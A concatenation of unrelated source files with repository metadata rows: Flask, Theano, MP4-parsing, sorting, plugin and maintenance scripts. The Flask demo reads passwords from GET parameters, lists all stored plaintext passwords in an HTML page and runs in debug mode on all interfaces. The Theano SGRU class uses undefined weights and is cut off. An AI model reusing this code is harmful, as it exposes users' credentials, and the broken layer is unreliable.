# From chain depends on the outbound profiles.
'felix-from-abcd': set(['felix-p-prof-1-o',
'felix-p-prof-2-o',
'felix-p-t1p1-o',
'felix-p-t1p2-o',
'felix-p-t2p1-o',]),
# To chain depends on the inbound profiles.
'felix-to-abcd': set(['felix-p-prof-1-i',
'felix-p-prof-2-i',
'felix-p-t1p1-i',
'felix-p-t1p2-i',
'felix-p-t2p1-i',])
}
)
tiered_policies = OrderedDict()
tiered_policies["tier_1"] = ["t1p1", "t1p2"]
tiered_policies["tier_2"] = ["t2p1"]
result = self.iptables_generator.endpoint_updates(4, "e1", "abcd",
"aa:22:33:44:55:66",
["prof-1", "prof-2"],
tiered_policies)
# Log the whole diff if the comparison fails.
self.maxDiff = None
self.assertEqual(result, expected_result)
| apache-2.0 | -435,367,150,946,990,660 | 39.4 | 110 | 0.507983 | false | 3.737 | true | false | false |
seerjk/reboot06 | 06/homework/demo1.py | 1 | 2785 | # coding:utf-8
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/login')
def index():
# return "<h1>hello world</h1>"
# return '<input type="button" value="click me">'
# default dir: ./templates
return render_template("login.html")
@app.route('/reboot')
def reboot():
return "<h1>hello, reboot</h1>"
@app.route('/test1')
def test1():
age = request.args.get('age')
print age
return "<h2>ages: %s</h2>" % age
@app.route('/test_form')
def test_form():
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name == "jiangk":
if passwd == "12345":
res = "Welcome %s" % name
else:
res = "passord wrong."
else:
res = "%s doesn't exist." % name
return res
#
try:
with open('user.txt') as f:
lines = f.readlines()
except Exception, e:
print "Error"
exit(-1)
user_dict = {}
for line in lines:
line = line.strip().split(' ')
user_dict[line[0]] = line[1]
@app.route('/test_user_file')
def test_user_file():
global user_dict
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name in user_dict:
if passwd == user_dict[name]:
res = "Welcome %s" % name
else:
res = "passord wrong."
else:
res = "%s doesn't exist." % name
return res
@app.route('/table1')
def table1():
return render_template("table1.html")
@app.route('/print_table')
def print_table():
res = '''
<table border="1">
<thead>
<tr>
<th>name</th>
<th>passwd</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/user_table')
def user_table():
res = '''
<table border="1">
<thead>
<tr>
<th>姓名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/test_args')
def test_args():
name = request.args.get('name')
print "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
return "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
if __name__ == "__main__":
app.run(host="0.0.0.0", port=9002, debug=True)
| mit | 8,115,482,448,132,503,000 | 19.094203 | 74 | 0.475298 | false | 3.243275 | true | false | false |
yochow/autotest | utils/coverage_suite.py | 1 | 1761 | #!/usr/bin/python
import os, sys
import unittest_suite
import common
from autotest_lib.client.common_lib import utils
root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def is_valid_directory(dirpath):
if dirpath.find('client/tests') >= 0:
return False
elif dirpath.find('client/site_tests') >= 0:
return False
elif dirpath.find('tko/migrations') >= 0:
return False
elif dirpath.find('server/tests') >= 0:
return False
elif dirpath.find('server/site_tests') >= 0:
return False
else:
return True
def is_valid_filename(f):
# has to be a .py file
if not f.endswith('.py'):
return False
# but there are execptions
if f.endswith('_unittest.py'):
return False
elif f == '__init__.py':
return False
elif f == 'common.py':
return False
else:
return True
def main():
coverage = os.path.join(root, "contrib/coverage.py")
unittest_suite = os.path.join(root, "unittest_suite.py")
# remove preceeding coverage data
cmd = "%s -e" % (coverage)
utils.system_output(cmd)
# run unittest_suite through coverage analysis
cmd = "%s -x %s" % (coverage, unittest_suite)
utils.system_output(cmd)
# now walk through directory grabbing lits of files
module_strings = []
for dirpath, dirnames, files in os.walk(root):
if is_valid_directory(dirpath):
for f in files:
if is_valid_filename(f):
temp = os.path.join(dirpath, f)
module_strings.append(temp)
# analyze files
cmd = "%s -r -m %s" % (coverage, " ".join(module_strings))
utils.system(cmd)
if __name__ == "__main__":
main()
| gpl-2.0 | 2,078,749,227,466,979,800 | 24.521739 | 69 | 0.593981 | false | 3.645963 | true | false | false |
KingSpork/sporklib | algorithms/search_and_sort_algorithms.py | 1 | 2377 | import random
'''Binary Search'''
def binarySearch(someList, target):
lo = 0
hi = len(someList)
while lo+1 < hi:
test = (lo + hi) / 2
if someList[test] > target:
hi = test
else:
lo = test
if someList[lo] == target:
return lo
else:
return -1
'''Find duplicates in array/list'''
def findDupes(someList):
dupes = []
hashTable = {}
uniques = set(someList)
if len(uniques) != len(someList):
for item in someList:
if hashTable.has_key(item) == True:
dupes.append(item)
else:
hashTable[item] = 0
return dupes
'''QuickSort, f yeah'''
def quickSort(someList):
listSize = len(someList) #get the length of the list
if len(someList) == 0: #if the list is empty...
return [] #...return an empty list
#ok, it gets real
less = [] #make an empty list for less
greater = [] #make an empty liss for greater
pivot = someList.pop(random.randint(0, listSize-1))
for element in someList:
if element <= pivot:
less.append(element)
else:
greater.append(element)
retList = quickSort(less) + [pivot] + quickSort(greater)
#print("Return list:");print(retList)
return retList
''' Heap Sort '''
def swap(someList, i, j):
someList[i], someList[j] = someList[j], someList[i]
def heapify(someList):
length = len(someList)
start = (length - 1) / 2
while start >= 0:
siftDown(someList, start, length-1)
start = start - 1
def siftDown(someList, start, end):
root = start #integers for indexes, remember
while (root * 2 + 1) <= end: #while root has at least one child
child = root * 2 + 1
swapper = root
if someList[swapper] < someList[child]:
swapper = child
if child+1 <= end and someList[swapper] < someList[child+1]:
swapper = child + 1
if swapper != root:
print("root: " + str(root) + " swapper: " + str(swapper))
try:
print("values: " + str(someList[root]) + " , " + str(someList[swapper]))
except:
print("Root or swapper out of range")
swap(someList, root, swapper)
root = swapper
else:
return
def heapSort(someList):
end = len(someList) -1
heapify(someList)
while end > 0:
swap(someList, end, 0)
end = end - 1
siftDown(someList, 0, end)
def isEqual(int1, int2, int3):
if int1 == int2 == int3:
return True
else:
return False | unlicense | 1,480,981,274,070,060,800 | 21.554455 | 76 | 0.611695 | false | 2.874244 | false | false | false |
obnam-mirror/obnam | obnamlib/fmt_ga/leaf_store.py | 1 | 2653 | # Copyright 2016-2017 Lars Wirzenius
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# =*= License: GPL-3+ =*=
import tracing
import obnamlib
class LeafStoreInterface(object): # pragma: no cover
def put_leaf(self, leaf):
raise NotImplementedError()
def get_leaf(self, leaf_id):
raise NotImplementedError()
def remove_leaf(self, leaf_id):
raise NotImplementedError()
def flush(self):
raise NotImplementedError()
class InMemoryLeafStore(LeafStoreInterface):
def __init__(self):
self._leaves = {}
self._counter = 0
def put_leaf(self, leaf):
self._counter += 1
self._leaves[self._counter] = leaf
return self._counter
def get_leaf(self, leaf_id):
return self._leaves.get(leaf_id, None)
def remove_leaf(self, leaf_id):
if leaf_id in self._leaves:
del self._leaves[leaf_id]
def flush(self):
pass
class LeafStore(LeafStoreInterface): # pragma: no cover
def __init__(self):
self._blob_store = None
def set_blob_store(self, blob_store):
self._blob_store = blob_store
def put_leaf(self, leaf):
leaf_id = self._blob_store.put_blob(leaf.as_dict())
tracing.trace('new leaf %s', leaf_id)
return leaf_id
def get_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
blob = self._blob_store.get_blob(leaf_id)
if blob is None:
tracing.trace('no blob for leaf %r', leaf_id)
return None
tracing.trace('got blob for leaf %r', leaf_id)
leaf = obnamlib.CowLeaf()
leaf.from_dict(self._blob_store.get_blob(leaf_id))
return leaf
def remove_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
# FIXME: This is a bit ugly, since we need to break the
# bag/blob store abstraction.
bag_id, _ = obnamlib.parse_object_id(leaf_id)
self._blob_store._bag_store.remove_bag(bag_id)
def flush(self):
self._blob_store.flush()
| gpl-3.0 | 48,278,622,617,393,850 | 26.635417 | 71 | 0.636638 | false | 3.65931 | false | false | false |
fabaff/fsl | fsl-maintenance.py | 1 | 7450 | #!/usr/bin/env python3
#
# fsl-maintenance - A helper script to maintain the Security Lab package list
# and other relevant maintenance tasks.
#
# Copyright (c) 2012-2019 Fabian Affolter <[email protected]>
#
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Credits goes to Robert Scheck. He did a lot brain work for the initial
# approach. This script is heavy based on his Perl scripts.
import argparse
import operator
import itertools
import datetime
import re
import sys
import os
try:
import columnize
except ImportError:
print("Please install pycolumnize first -> sudo dnf -y install python3-columnize")
import dnf
try:
import git
except ImportError:
print("Please install GitPython first -> sudo dnf -y install python3-GitPython")
try:
import yaml
except ImportError:
print("Please install PyYAML first -> sudo dnf -y install PyYAML")
try:
import click
except ImportError:
print("Please install click first -> sudo dnf -y install python3-click")
DEFAULT_FILENAME = 'pkglist.yaml'
repo = git.Repo(os.getcwd())
def getPackages():
"""Read YAML package file and return all packages."""
file = open(DEFAULT_FILENAME, 'r')
pkgslist = yaml.safe_load(file)
file.close()
return pkgslist
@click.group()
@click.version_option()
def cli():
"""fsl-maintenance
This tool can be used for maintaining the Fedora Security Lab package list.
"""
@cli.group()
def display():
"""Display the details about the packages."""
@display.command('full')
def full():
"""All included tools and details will be printed to STDOUT."""
pkgslist = getPackages()
pkgslistIn = []
pkgslistEx = []
pkgslistAll = []
# All packages
pkgslistAll = []
for pkg in pkgslist:
pkgslistAll.append(pkg['pkg'])
# Split list of packages into included and excluded packages
# Not used at the moment
#for pkg in pkgslist:
# if 'exclude' in pkg:
# pkgslistEx.append(pkg['pkg'])
# else:
# pkgslistIn.append(pkg['pkg'])
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab.\n")
print("Packages in comps : ", len(pkgslist))
#print("Packages included in live media : ", len(pkgslistIn))
print("\nPackage listing:")
sorted_pkgslist = sorted(pkgslistAll)
print(columnize.columnize(sorted_pkgslist, displaywidth=72))
@display.command('raw')
def raw():
"""The pkglist.yaml file will be printed to STDOUT."""
pkgslist = getPackages()
print(yaml.dump(pkgslist))
@display.command('short')
def short():
"""Only show the absolute minimum about the package list."""
pkgslist = getPackages()
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab\n")
print("Packages in comps : ", len(pkgslist))
print("\nTo see all available options use -h or --help.")
@cli.group()
def output():
"""Create various output from the package list."""
@output.command('comps')
def comps():
"""
Generates the entries to include into the comps-fXX.xml.in file.
<packagelist>
...
</packagelist>
"""
pkgslist = getPackages()
# Split list of packages into eincluded and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
entry = ' <packagereq type="default">{}</packagereq>'.format(pkg['pkg'])
print(entry)
@output.command('playbook')
def playbook():
"""Generate an Ansible playbook for the installation."""
pkgslist = getPackages()
part1 = """# This playbook installs all Fedora Security Lab packages.
#
# Copyright (c) 2013-2018 Fabian Affolter <[email protected]>
#
# All rights reserved.
# This file is licensed under GPLv2, for more details check COPYING.
#
# Generated by fsl-maintenance.py at %s
#
# Usage: ansible-playbook fsl-packages.yml -f 10
---
- hosts: fsl_hosts
user: root
tasks:
- name: install all packages from the FSL
dnf: pkg={{ item }}
state=present
with_items:\n""" % (datetime.date.today())
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
# Write the playbook files
fileOut = open('ansible-playbooks/fsl-packages.yml', 'w')
fileOut.write(part1)
for pkg in sorted_pkgslist:
fileOut.write(' - %s\n' % pkg['pkg'])
fileOut.close()
# Commit the changed file to the repository
repo.git.add('ansible-playbooks/fsl-packages.yml')
repo.git.commit(m='Update playbook')
repo.git.push()
@output.command('live')
def live():
"""Generate the exclude list for the kickstart file."""
pkgslist = getPackages()
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
if pkg['exclude'] == 1:
print("- ", pkg['pkg'])
@output.command('menus')
def menus():
"""Generate the .desktop files which are used for the menu structure."""
pkgslist = getPackages()
# Terminal is the standard terminal application of the Xfce desktop
terminal = 'xfce4-terminal'
# Collects all files in the directory
filelist = []
os.chdir('security-menu')
for files in os.listdir("."):
if files.endswith(".desktop"):
filelist.append(files)
# Write the .desktop files
for pkg in pkgslist:
if 'command' and 'name' in pkg:
file_out = open('security-{}.desktop'.format(pkg['pkg']), 'w')
file_out.write('[Desktop Entry]\n')
file_out.write('Name={}\n'.format(pkg['name']))
file_out.write("Exec={} -e \"su -c '{}; bash'\"\n".format(
terminal, pkg['command']))
file_out.write('TryExec={}\n'.format(pkg['pkg']))
file_out.write('Type=Application\n')
file_out.write('Categories=System;Security;X-SecurityLab;'
'X-{};\n'.format(pkg['category']))
file_out.close()
# Compare the needed .desktop file against the included packages, remove
# .desktop files from exclude packages
dellist = filelist
for pkg in pkgslist:
if 'command' in pkg:
dellist.remove('security-{}.desktop'.format(pkg['pkg']))
if 'exclude' in pkg:
if pkg['exclude'] == 1:
dellist.append('security-{}.desktop'.format(pkg['pkg']))
# Remove the .desktop files which are no longer needed
if len(dellist) != 0:
for file in dellist:
os.remove(file)
if __name__ == '__main__':
cli()
| gpl-2.0 | -920,566,221,492,696,600 | 29.658436 | 86 | 0.654497 | false | 3.87013 | false | false | false |
hyt-hz/mediautils | mediautils/mp4/parser.py | 1 | 9133 | import struct
import traceback
import logging
class FileCache(object):
def __init__(self, file_obj, cache_size=0x0FFF):
self._file = file_obj
self._cache = None
self._cache_read_size = cache_size
self._cache_offset = 0
self.offset = 0
def read_from(self, start_offset, size, move=True):
if self._cache is None \
or start_offset >= self._cache_offset + self._cache_size \
or start_offset < self._cache_offset:
self._read2cache(start_offset)
if self._cache_size == 0:
return ''
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data = self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return ''
while True:
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return data + self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data += self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return data
def read(self, size):
return self.read_from(self.offset, size)
def peek(self, size):
return self.read_from(self.offset, size, move=False)
def seek(self, offset):
self._file.seek(offset)
self.offset = offset
def tell(self):
return self.offset
def forward(self, size):
self.offset += size
def backward(self, size):
if self.offset <= size:
self.offset = 0
else:
self.offset -= size
def _read2cache(self, offset=None):
if offset is None:
# continue
self._cache_offset += self._cache_size
self._cache = self._file.read(self._cache_read_size)
else:
self._file.seek(offset)
self._cache = self._file.read(self._cache_read_size)
self._cache_offset = offset
@property
def _cache_size(self):
if self._cache:
return len(self._cache)
return 0
class BoxMetaClass(type):
def __init__(cls, name, bases, dct):
if hasattr(cls, 'boxtype'):
cls.box_classes[cls.boxtype] = cls
super(BoxMetaClass, cls).__init__(name, bases, dct)
class Box(object):
box_classes = {} # key value pair of box type name and corresponding subclass
# filled by metaclass
__metaclass__ = BoxMetaClass
direct_children = False
def __init__(self, data, parent):
self.box_offset = data.tell()
self.parent = parent
self.size, = struct.unpack('>I', data.read(4))
self.type = data.read(4)
self.next = None
self.children = []
if self.size == 1:
# 64-bit size
self.size, = struct.unpack('>Q', data.read(8))
elif self.size == 0:
# to the end of file
pass
else:
pass
self.body_offset = data.tell()
self._parse(data)
def _parse(self, data):
if self.direct_children:
self._parse_child(data)
else:
data.seek(self.box_offset+self.size)
def _parse_child(self, data):
while True:
if self.parent and self.parent.end_offset and data.tell() >= self.parent.end_offset:
return
if self.end_offset and data.tell() >= self.end_offset:
return
try:
child = Box.factory(data, self)
except Exception:
print traceback.format_exc()
return
if child:
self.children.append(child)
else:
return
def iter_child(self, deep=False):
for child in self.children:
yield child
if deep:
for box in child.iter_child(deep=True):
yield box
@property
def end_offset(self):
if self.size:
return self.box_offset + self.size
else:
return 0
def find_children(self, box_type, deep=False, only_first=False):
children = []
for child in self.iter_child(deep=deep):
if child.type == box_type:
if only_first:
return child
else:
children.append(child)
return children
@classmethod
def factory(cls, data, parent):
boxtype = data.peek(8)[4:8]
if len(boxtype) == 0:
return None
if boxtype in cls.box_classes:
return cls.box_classes[boxtype](data, parent)
else:
return cls(data, parent)
class BoxRoot(Box):
boxtype = 'ROOT'
direct_children = True
def __init__(self, data):
self.box_offset = data.tell()
self.body_offset = self.box_offset
self.parent = None
self.size = 0
self.type = self.boxtype
self.children = []
self._parse(data)
class BoxMoov(Box):
boxtype = 'moov'
def _parse(self, data):
self._parse_child(data)
class BoxTrak(Box):
boxtype = 'trak'
direct_children = True
class BoxMdia(Box):
boxtype = 'mdia'
direct_children = True
class BoxMdhd(Box):
boxtype = 'mdhd'
def _parse(self, data):
self.version, = struct.unpack('>B', data.read(1))
self.flag = data.read(3)
if self.version == 0:
self.creation_time, = struct.unpack('>I', data.read(4))
self.modification_time, = struct.unpack('>I', data.read(4))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>I', data.read(4))
else:
self.creation_time, = struct.unpack('>Q', data.read(8))
self.modification_time, = struct.unpack('>Q', data.read(8))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>Q', data.read(8))
data.forward(4)
class BoxMinf(Box):
boxtype = 'minf'
direct_children = True
class BoxStbl(Box):
boxtype = 'stbl'
direct_children = True
class BoxStts(Box):
boxtype = 'stts'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*8)
def iter_time_to_sample(self):
offset = 0
end_offset = self.entry_count*8
while offset + 8 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0], struct.unpack('>I', self._entries[offset+4:offset+8])[0]
offset += 8
def sample_time(self, sample):
accum_samples = 0
accum_time = 0
for sample_count, sample_delta in self.iter_time_to_sample():
if sample < accum_samples + sample_count:
return accum_time + (sample - accum_samples)*sample_delta
accum_samples += sample_count
accum_time += sample_count*sample_delta
class BoxStss(Box):
# return sample starts from 0 instead of from 1
boxtype = 'stss'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*4)
def sync_sample(self, index):
if index+1 > self.entry_count:
raise Exception('stss index {} too large'.format(index))
return struct.unpack('>I', self._entries[index*4:index*4+4])[0] - 1
def iter_sync_sample(self):
offset = 0
end_offset = self.entry_count*4
while offset + 4 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0] - 1
offset += 4
if __name__ == '__main__':
def print_all_children(box, prefix=''):
for child in box.iter_child():
print prefix, child.type
print_all_children(child, prefix+' ')
with open('ted.mp4', 'rb') as f:
data = FileCache(f)
mp4 = BoxRoot(data)
print_all_children(mp4)
print '\nstss data:'
for trak in mp4.find_children('trak', deep=True):
stts = trak.find_children('stts', deep=True, only_first=True)
stss = trak.find_children('stss', deep=True, only_first=True)
mdhd = trak.find_children('mdhd', deep=True, only_first=True)
if stts and stss:
for sync_sample in stss.iter_sync_sample():
print sync_sample, stts.sample_time(sync_sample), float(stts.sample_time(sync_sample))/mdhd.timescale
| gpl-3.0 | -415,757,000,598,475,300 | 29.241722 | 130 | 0.545604 | false | 3.775527 | false | false | false |
Shuailong/Leetcode | solutions/bulb-switcher.py | 1 | 1128 | #!/usr/bin/env python
# encoding: utf-8
"""
bulb-switcher.py
Created by Shuailong on 2015-12-19.
https://leetcode.com/problems/bulb-switcher.
"""
'''key: find the law and rewrite the solution'''
from math import floor,sqrt
class Solution1(object):
'''Too time consuming'''
def factors(self,n):
'''
How many factors does the integer n have?
'''
if n == 1:
return 1
count = 0
for i in range(2, n):
if n % i == 0:
count += 1
return count+2
def bulbSwitch(self, n):
"""
:type n: int
:rtype: int
"""
count = 0
for i in range(1, n+1):
if self.factors(i) % 2 == 1:
count += 1
return count
class Solution(object):
def bulbSwitch(self,n):
"""
:type n: int
:rtype: int
"""
return int(floor(sqrt(n)))
def main():
solution = Solution()
solution1 = Solution1()
for n in range(1,20):
print n, solution.bulbSwitch(n)
if __name__ == '__main__':
main()
| mit | -5,968,391,800,125,050,000 | 16.369231 | 49 | 0.489362 | false | 3.54717 | false | false | false |
kif/UPBL09a | dahu/plugin.py | 1 | 5115 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
Data Analysis Highly tailored fror Upbl09a
"""
from __future__ import with_statement, print_function, absolute_import, division
__authors__ = ["Jérôme Kieffer"]
__contact__ = "[email protected]"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "31/10/2018"
__status__ = "production"
from .factory import plugin_factory, register
from .utils import fully_qualified_name, get_workdir
import os
import logging
import cProfile
logger = logging.getLogger("dahu.plugin")
class Plugin(object):
"""
A plugin is instanciated
* Gets its input parameters as a dictionary from the setup method
* Performs some work in the process
* Sets the result as output attribute, should be a dictionary
* The process can be an infinite loop or a server which can be aborted using the abort method
"""
DEFAULT_SET_UP = "setup" # name of the method used to set-up the plugin (close connection, files)
DEFAULT_PROCESS = "process" # specify how to run the default processing
DEFAULT_TEAR_DOWN = "teardown" # name of the method used to tear-down the plugin (close connection, files)
DEFAULT_ABORT = "abort" # name of the method used to abort the plugin (if any. Tear_Down will be called)
def __init__(self):
"""
We assume an empty constructor
"""
self.input = {}
self.output = {}
self._logging = [] # stores the logging information to send back
self.is_aborted = False
self.__profiler = None
def get_name(self):
return self.__class__.__name__
def setup(self, kwargs=None):
"""
This is the second constructor to setup
input variables and possibly initialize
some objects
"""
if kwargs is not None:
self.input.update(kwargs)
if self.input.get("do_profiling"):
self.__profiler = cProfile.Profile()
self.__profiler.enable()
def process(self):
"""
main processing of the plugin
"""
pass
def teardown(self):
"""
method used to tear-down the plugin (close connection, files)
This is always run, even if process fails
"""
self.output["logging"] = self._logging
if self.input.get("do_profiling"):
self.__profiler.disable()
name = "%05i_%s.%s.profile" % (self.input.get("job_id", 0), self.__class__.__module__, self.__class__.__name__)
profile_file = os.path.join(get_workdir(), name)
self.log_error("Profiling information in %s" % profile_file, do_raise=False)
self.__profiler.dump_stats(profile_file)
def get_info(self):
"""
"""
return os.linesep.join(self._logging)
def abort(self):
"""
Method called to stop a server process
"""
self.is_aborted = True
def log_error(self, txt, do_raise=True):
"""
Way to log errors and raise error
"""
if do_raise:
err = "ERROR in %s: %s" % (self.get_name(), txt)
logger.error(err)
else:
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
if do_raise:
raise RuntimeError(err)
def log_warning(self, txt):
"""
Way to log warning
"""
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
class PluginFromFunction(Plugin):
"""
Template class to build a plugin from a function
"""
def __init__(self):
"""
:param funct: function to be wrapped
"""
Plugin.__init__(self)
def __call__(self, **kwargs):
"""
Behaves like a normal function: for debugging
"""
self.input.update(kwargs)
self.process()
self.teardown()
return self.output["result"]
def process(self):
if self.input is None:
print("PluginFromFunction.process: self.input is None !!! %s", self.input)
else:
funct_input = self.input.copy()
if "job_id" in funct_input:
funct_input.pop("job_id")
if "plugin_name" in funct_input:
funct_input.pop("plugin_name")
self.output["result"] = self.function(**funct_input)
def plugin_from_function(function):
"""
Create a plugin class from a given function and registers it into the
:param function: any function
:return: plugin name to be used by the plugin_factory to get an instance
"""
logger.debug("creating plugin from function %s" % function.__name__)
class_name = function.__module__ + "." + function.__name__
klass = type(class_name, (PluginFromFunction,),
{'function': staticmethod(function),
"__doc__": function.__doc__})
plugin_factory.register(klass, class_name)
return class_name
| gpl-2.0 | -6,533,337,136,667,705,000 | 29.987879 | 123 | 0.584588 | false | 3.95743 | false | false | false |
MikeTheGreat/GLT | Tests/SeleniumTest.py | 1 | 1553 | """Testing the PyUnit / Selenium (WebDriver for Chrome) integration"""
import unittest
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
class TestSelenium(unittest.TestCase):
""""Apparently PyUnit looks for classes that inherit from TestCase """
def test_chrome(self):
"""Can I get chrome to work via WebDriver?"""
# Create a new instance of the Chrome driver
driver = webdriver.Chrome()
# go to the google home page
driver.get("http://www.google.com")
# the page is ajaxy so the title is originally this:
print driver.title
# find the element that's name attribute is q (the google search box)
input_element = driver.find_element_by_name("q")
# type in the search
input_element.send_keys("cheese!")
# submit the form (although google automatically searches now without submitting)
input_element.submit()
try:
# we have to wait for the page to refresh, the last thing that seems
# to be updated is the title
WebDriverWait(driver, 10).until(EC.title_contains("cheese!"))
# You should see "cheese! - Google Search"
print driver.title
if driver.title != "cheese! - Google Search":
self.fail()
finally:
driver.quit()
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -2,201,033,008,625,944,800 | 32.76087 | 89 | 0.637476 | false | 4.437143 | true | false | false |
chuckgu/Alphabeta | theano/library/Modified_Layers.py | 1 | 23038 | import theano
import theano.tensor as T
import numpy as np
from Initializations import glorot_uniform,zero,alloc_zeros_matrix,glorot_normal,numpy_floatX,orthogonal,one,uniform
import theano.typed_list
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from Activations import relu,LeakyReLU,tanh,sigmoid,linear,mean,max,softmax,hard_sigmoid
from Recurrent_Layers import Recurrent
from Layers import dropout_layer
class SGRU(Recurrent):
def __init__(self,n_in,n_hidden,n_seg=4,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.n_seg=int(n_seg)
self.input= T.tensor3()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.W_z1 = glorot_uniform((n_in,n_hidden/4))
self.b_z1 = zero((n_hidden/4,))
self.W_z2 = glorot_uniform((n_in,n_hidden/4))
self.b_z2 = zero((n_hidden/4,))
self.W_z3 = glorot_uniform((n_in,n_hidden/4))
self.b_z3 = zero((n_hidden/4,))
self.W_z4 = glorot_uniform((n_in,n_hidden/4))
self.b_z4 = zero((n_hidden/4,))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.W_r1 = glorot_uniform((n_in,n_hidden/4))
self.b_r1 = zero((n_hidden/4,))
self.W_r2 = glorot_uniform((n_in,n_hidden/4))
self.b_r2 = zero((n_hidden/4,))
self.W_r3 = glorot_uniform((n_in,n_hidden/4))
self.b_r3 = zero((n_hidden/4,))
self.W_r4 = glorot_uniform((n_in,n_hidden/4))
self.b_r4 = zero((n_hidden/4,))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.W_h1 = glorot_uniform((n_in,n_hidden/4))
self.b_h1 = zero((n_hidden/4,))
self.W_h2 = glorot_uniform((n_in,n_hidden/4))
self.b_h2 = zero((n_hidden/4,))
self.W_h3 = glorot_uniform((n_in,n_hidden/4))
self.b_h3 = zero((n_hidden/4,))
self.W_h4 = glorot_uniform((n_in,n_hidden/4))
self.b_h4 = zero((n_hidden/4,))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h):
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z))
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r))
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h))
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def get_output(self, train=False, init_state=None):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.concatenate([T.dot(X, self.W_z1) + self.b_z1, T.dot(X, self.W_z2) + self.b_z2,T.dot(X, self.W_z3) + self.b_z3,T.dot(X, self.W_z4) + self.b_z4], axis=-1)
x_r = T.concatenate([T.dot(X, self.W_r1) + self.b_r1, T.dot(X, self.W_r2) + self.b_r2,T.dot(X, self.W_r3) + self.b_r3,T.dot(X, self.W_r4) + self.b_r4], axis=-1)
